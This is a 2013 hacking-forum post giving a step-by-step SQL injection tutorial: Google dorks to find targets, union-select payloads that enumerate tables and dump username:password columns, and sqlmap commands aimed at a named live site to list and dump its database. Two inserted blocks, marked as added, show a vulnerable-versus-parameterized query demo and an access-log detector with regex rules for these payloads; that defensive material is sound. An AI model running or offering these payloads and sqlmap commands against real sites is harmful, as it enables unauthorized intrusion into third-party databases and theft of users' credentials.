SQLi Tut + SQLmap! 02-16-2013, 01:20 AM
#1
Instinct and I are working on a tut.
I'm going to work on all the formatting here.
SQLi
What is SQLi?
SQLi is injecting a series of "custom" code into a webpage to give you access to the database. You can get data such as the admin username and password, along with the usernames and passwords of the members of the website. SQLi is the most common and easiest method of "hacking" today.
Let's get started.
List of dorks
More can be found here: http://pastebin.com/1c0mvpJJ
You are going to enter a dork on Google and put a ' after the ?id=x
If you get an error saying something along the lines of "You have an error in your SQL syntax..." then the site is vulnerable.
Finding the # columns
At the end of the URL enter
Code:
order by 5--
For example
url.com/index.php?id=1 order by 5--
If the page reloads normally, go up, for example
url.com/index.php?id=1 order by 10
If you get an error, go down.
You want to get to the number right below the first one that gives an error.
So if order by 7 gives an error but 6 does not, 6 is the number of columns.
Finding the vulnerable columns
Since there are 6 columns, you are going to enter
Code:
Union Select 1,2,3,4,5,6--
and put a - after the = sign:
url.com/index.php?id=-1 Union Select 1,2,3,4,5,6--
You have to put a - after the =.
You should get some numbers showing up on the page. Those are the vulnerable columns.
Getting The Version
Pick a vulnerable column and replace it with
Code:
@@version
As an example I'll use 2 as the vulnerable column:
url.com/index.php?id=-1 Union Select 1, @@version,3,4,5,6--
or
url.com/index.php?id=-1 Union Select 1, group_concat(@@version),3,4,5,6--
Both work.
The result would be something along the lines of
Code:
5.1.37-1ubuntu5.5-log
The text after the number doesn't matter, but if the number is below 5 then this method won't work.
Getting The DB Name
Replace the vulnerable column with
Code:
concat(database())
This will get you the database name. Write it down.
Getting table name
Delete
Code:
concat(database())
and replace it with
Code:
group_concat(table_name)
and before the -- put
Code:
FROM information_schema.tables WHERE table_schema=database()
Example
url.com/index.php?id=-1 Union Select 1, group_concat(table_name),3,4,5,6 FROM information_schema.tables WHERE table_schema=database() --
Now you are going to get a list. Look for anything having to do with admin, login, users, anything that could potentially have usernames and passwords. Convert the table name of your choice to hex via a text-to-hex converter.
Getting Column Names
Now replace
Code:
group_concat(table_name)
with
Code:
group_concat(column_name)
and replace
Code:
FROM information_schema.tables WHERE table_schema=database()--
with
Code:
FROM information_schema.columns WHERE table_name=0xHEX
where HEX is the hex of the table name, without quotes. You need the 0x directly before the hex, so no space.
Getting The Data
Now if you picked the "right" table you should get something that says ID, Username, Password, and sometimes address, email and more.
Now replace
Code:
group_concat(column_name)
with the column(s) of your choice. If you want two columns you put 0x3a in between them, with a comma before and after the 0x3a, for example
Code:
group_concat(username,0x3a,password)
and replace
Code:
FROM information_schema.columns WHERE table_name=0xHEX
with
Code:
FROM DBName.tablename
Replace DBName with the database name you got from the concat(database()) command earlier, and tablename with the table name that you converted to hex, but you can use plain text for this one.
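Why the -1 Union Select step returns rows from another table, and what stops it, as an added example that is not part of the tutorial: a toy SQLite database standing in for the site's back end, a lookup that pastes the ?id= value into the SQL the way the vulnerable pages above do, and the parameterized version beside it. The news and users tables and their rows are constructed for the example.

```python
import sqlite3

# Constructed toy back end for the example (not from the tutorial): a "news"
# table the page normally reads, and a "users" table the injection reaches.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT, body TEXT);
        INSERT INTO news VALUES (1, 'Welcome', 'first post');
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'hunter2');
    """)
    return db

def fetch_news_vulnerable(db, id_param):
    # The defect the tutorial relies on: the raw ?id= value becomes SQL text,
    # so "order by", "union select" and "--" are parsed as SQL, not as a number.
    sql = "SELECT id, title, body FROM news WHERE id=" + id_param
    return db.execute(sql).fetchall()

def unsafe_query_errors(db, id_param):
    # True when the unsafe query raises a database error: the "error in your
    # SQL syntax" symptom the tutorial's ' probe looks for. Showing that error
    # on the page is what tells a visitor the parameter is injectable.
    try:
        fetch_news_vulnerable(db, id_param)
        return False
    except sqlite3.OperationalError:
        return True

def fetch_news_safe(db, id_param):
    # Hardened form: the value is bound as a parameter, so the database
    # compares it to id as data. A payload is just a string that matches no
    # row, and a stray quote gives an empty result instead of an error.
    return db.execute("SELECT id, title, body FROM news WHERE id=?",
                      (id_param,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    payload = "-1 union select id,username,password from users--"
    print(fetch_news_vulnerable(db, payload))  # the users row, via UNION
    print(fetch_news_safe(db, payload))        # []
```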
SQLmap
Quote: "sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections."
SQLmap is a tool that is used a lot because it does things much faster than doing them manually. I'd prefer you know how to do a manual injection before you try this tool, or else you won't learn anything.
You can download SQLmap here: http://sqlmap.org/
Let's get started!
Things you need:
-A website vulnerable to a SQLi injection!
-A brain
-Python installed
I assume you know how a basic SQLi injection works.
I'm running Linux so I'll explain how to do it in Linux. On Windows it's basically the same except you have to put python in front of ./sqlmap.py every time.
So I'm going to my SQLmap directory.
In my case it's
Code:
cd /home/instinct/SQLmap
Alright, once we've found our vulnerable site, you want to get the databases. In order to do this you have to use this command:
Code:
./sqlmap.py -u http://senesco.com/newsitem.php?id=211 --dbs
The -u means it's going to be given the site's URL.
The --dbs means it's going to fetch the databases.
Now once you've done that you'll get this screen:
(screenshot)
Those are the databases.
We want to take a look in infofir_SE.
In order to do that you'll have to use this command:
Code:
./sqlmap.py -u http://senesco.com/newsitem.php?id=211 -D infofir_SE --tables
What this command does is get the tables from the database.
-D infofir_SE is the database we want the tables from.
--tables means it's going to get the tables.
Once you've done that you'll see something like this:
(screenshot)
These are the tables.
Now for example we want to take a look in the table called "sec".
In order to do this we'll have to use this command:
Code:
./sqlmap.py -u http://senesco.com/newsitem.php?id=211 -D infofir_SE -T sec --columns
-D infofir_SE is the database we want to extract the columns from.
-T sec is the table we want to extract the columns from.
--columns gets the columns from the table called "sec" (-T sec).
Once you've done that you'll see this:
(screenshot)
These are the columns.
Now to look at what's inside the columns you have to use this command:
Code:
./sqlmap.py -u http://senesco.com/newsitem.php?id=211 -D infofir_SE -T sec -C --dump
-C means the columns.
--dump means getting the data and saving it to a file.
The file will be saved wherever your SQLmap folder is located, under "output"; search there for the name of the site.
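From the defender's side, as an added example that is not part of the tutorial: a small detector that runs over constructed Apache access-log lines and flags the requests each step above produces (the ' probe answered by a 5xx, order by, union select, information_schema) plus the tool's User-Agent. It assumes the log is in combined format and that sqlmap keeps its default User-Agent, which names the tool and which the commands above do not change; the log lines, addresses and UA string are constructed sample data.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format log lines (sample data, not from the
# tutorial). The 203.0.113.5 requests replay the manual steps above; the
# 198.51.100.9 request carries a constructed sqlmap-style User-Agent.
SAMPLE_LOG = r"""
203.0.113.5 - - [16/Feb/2013:01:20:01 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [16/Feb/2013:01:20:07 +0000] "GET /index.php?id=1%27 HTTP/1.1" 500 312 "-" "Mozilla/5.0"
203.0.113.5 - - [16/Feb/2013:01:20:15 +0000] "GET /index.php?id=1+order+by+6-- HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [16/Feb/2013:01:21:02 +0000] "GET /index.php?id=-1+Union+Select+1,group_concat(table_name),3,4,5,6+FROM+information_schema.tables+WHERE+table_schema=database()-- HTTP/1.1" 200 900 "-" "Mozilla/5.0"
198.51.100.9 - - [16/Feb/2013:01:30:00 +0000] "GET /newsitem.php?id=211 HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
192.0.2.77 - - [16/Feb/2013:01:31:00 +0000] "GET /index.php?id=42 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# One rule per step of the tutorial, matched against the URL-decoded query.
RULES = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"information_schema\.", re.I),
    "version_probe": re.compile(r"@@version", re.I),
}

def classify(line):
    """Return (ip, [reasons]) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = unquote_plus(m.group("path"))  # payloads arrive URL-encoded
    reasons = [name for name, rule in RULES.items() if rule.search(decoded)]
    if "sqlmap" in m.group("ua").lower():      # assumption: default UA kept
        reasons.append("sqlmap_user_agent")
    if "'" in decoded and m.group("status").startswith("5"):
        reasons.append("quote_probe_error")    # the ' test that raises an error
    return m.group("ip"), reasons

def suspicious_sources(log_text):
    """Map each client IP to the sorted list of rules it tripped."""
    hits = {}
    for line in log_text.strip().splitlines():
        parsed = classify(line)
        if parsed and parsed[1]:
            hits.setdefault(parsed[0], set()).update(parsed[1])
    return {ip: sorted(r) for ip, r in hits.items()}
```

The same rules fit a WAF or SIEM query; the point is that every manual step in this tutorial, and the tool's default run, leaves a distinct fingerprint in ordinary access logs.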
I hope you enjoyed this tutorial.
Devil Child
INST1NCT
Brought to you by The Goons!
#MakeSinisterlySexyAgain